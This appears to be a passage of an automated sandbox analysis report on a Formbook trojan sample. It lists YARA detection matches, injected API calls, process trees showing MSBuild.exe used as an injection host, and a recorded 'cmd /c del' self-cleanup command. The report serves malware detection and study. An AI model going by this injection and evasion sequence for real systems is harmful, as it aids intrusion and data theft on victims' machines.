          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.568249017.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.582276153.000000000E3F1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe PID: 1092, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: MSBuild.exe PID: 2808, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: Process Memory Space: cmmon32.exe PID: 5908, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeCode function: 0_2_0285C1C40_2_0285C1C4
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeCode function: 0_2_0285E6000_2_0285E600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeCode function: 0_2_0285E6100_2_0285E610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004010303_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E2553_2_0041E255
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041C3E73_2_0041C3E7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041DB943_2_0041DB94
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00402D873_2_00402D87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00402D903_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D5A63_2_0041D5A6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00409E603_2_00409E60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041E7243_2_0041E724
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00402FB03_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0100F9003_2_0100F900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010241203_2_01024120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010299BF3_2_010299BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C10023_2_010C1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DE8243_2_010DE824
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A8303_2_0102A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101B0903_2_0101B090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010320A03_2_010320A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D20A83_2_010D20A8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D28EC3_2_010D28EC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102A3093_2_0102A309
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2B283_2_010D2B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0102AB403_2_0102AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103EBB03_2_0103EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C03DA3_2_010C03DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0103ABD83_2_0103ABD8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CDBD23_2_010CDBD2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010B23E33_2_010B23E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010BFA2B3_2_010BFA2B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D22AE3_2_010D22AE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C4AEF3_2_010C4AEF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2D073_2_010D2D07
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01000D203_2_01000D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1D553_2_010D1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010325813_2_01032581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C2D823_2_010C2D82
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D25DD3_2_010D25DD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101D5E03_2_0101D5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0101841F3_2_0101841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CD4663_2_010CD466
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010C44963_2_010C4496
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010DDFCE3_2_010DDFCE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D1FF13_2_010D1FF1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010CD6163_2_010CD616
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01026E303_2_01026E30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010D2EF73_2_010D2EF7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0100B150 appears 133 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A360 NtCreateFile,3_2_0041A360
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A410 NtReadFile,3_2_0041A410
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A490 NtClose,3_2_0041A490
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A540 NtAllocateVirtualMemory,3_2_0041A540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A35C NtCreateFile,3_2_0041A35C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041A53B NtAllocateVirtualMemory,3_2_0041A53B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049910 NtAdjustPrivilegesToken,LdrInitializeThunk,3_2_01049910
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010499A0 NtCreateSection,LdrInitializeThunk,3_2_010499A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049840 NtDelayExecution,LdrInitializeThunk,3_2_01049840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049860 NtQuerySystemInformation,LdrInitializeThunk,3_2_01049860
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010498F0 NtReadVirtualMemory,LdrInitializeThunk,3_2_010498F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A00 NtProtectVirtualMemory,LdrInitializeThunk,3_2_01049A00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A20 NtResumeThread,LdrInitializeThunk,3_2_01049A20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A50 NtCreateFile,LdrInitializeThunk,3_2_01049A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049540 NtReadFile,LdrInitializeThunk,3_2_01049540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010495D0 NtClose,LdrInitializeThunk,3_2_010495D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049710 NtQueryInformationToken,LdrInitializeThunk,3_2_01049710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049780 NtMapViewOfSection,LdrInitializeThunk,3_2_01049780
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010497A0 NtUnmapViewOfSection,LdrInitializeThunk,3_2_010497A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049660 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_01049660
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010496E0 NtFreeVirtualMemory,LdrInitializeThunk,3_2_010496E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049950 NtQueueApcThread,3_2_01049950
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010499D0 NtCreateProcessEx,3_2_010499D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049820 NtEnumerateKey,3_2_01049820
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104B040 NtSuspendThread,3_2_0104B040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010498A0 NtWriteVirtualMemory,3_2_010498A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049B00 NtSetValueKey,3_2_01049B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A3B0 NtGetContextThread,3_2_0104A3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A10 NtQuerySection,3_2_01049A10
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049A80 NtOpenDirectoryObject,3_2_01049A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049520 NtWaitForSingleObject,3_2_01049520
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104AD30 NtSetContextThread,3_2_0104AD30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049560 NtWriteFile,3_2_01049560
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010495F0 NtQueryInformationFile,3_2_010495F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A710 NtOpenProcessToken,3_2_0104A710
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049730 NtQueryVirtualMemory,3_2_01049730
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049760 NtOpenProcess,3_2_01049760
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049770 NtSetInformationFile,3_2_01049770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0104A770 NtOpenThread,3_2_0104A770
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049FE0 NtCreateMutant,3_2_01049FE0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049610 NtEnumerateValueKey,3_2_01049610
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049650 NtQueryValueKey,3_2_01049650
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_01049670 NtQueryInformationProcess,3_2_01049670
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_010496D0 NtCreateKey,3_2_010496D0
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002C7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.342450327.0000000003A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.351962017.0000000008A30000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000000.302945463.0000000000708000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJFfV.exeD vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.352005320.0000000008BB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.351897142.0000000008A00000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameB4000.dll> vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.332432341.0000000002C9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCruiser.dll, vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe, 00000000.00000002.342450327.0000000003BE5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHIVacSim.dll2 vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeBinary or memory string: OriginalFilenameJFfV.exeD vs SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeReversingLabs: Detection: 15%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeVirustotal: Detection: 36%
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@512/2@4/3
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:472:120:WilError_01
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: *.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
          Source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: SecuriteInfo.com.Win32.MalwareX-gen.19132.11695.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: cmmon32.pdb source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: cmmon32.pdbGCTL source: MSBuild.exe, 00000003.00000002.379397071.0000000000FC0000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000003.00000003.329387345.0000000000C9B000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000003.331569732.0000000000E3F000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.379956956.0000000004AC0000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000003.375918815.000000000492E000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004C60000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000005.00000002.568542512.0000000004D7F000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: explorer.exe, 00000004.00000002.588065126.00000000152CF000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000005.00000002.570075548.000000000518F000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00417141 push edi; iretd 3_2_00417148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0040E304 push esp; ret 3_2_0040E308
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_004164D8 push eax; iretd 3_2_004164EA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_00419C86 push ebx; retf 3_2_00419C87
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 3_2_0041D4B5 push eax; ret 3_2_0041D508
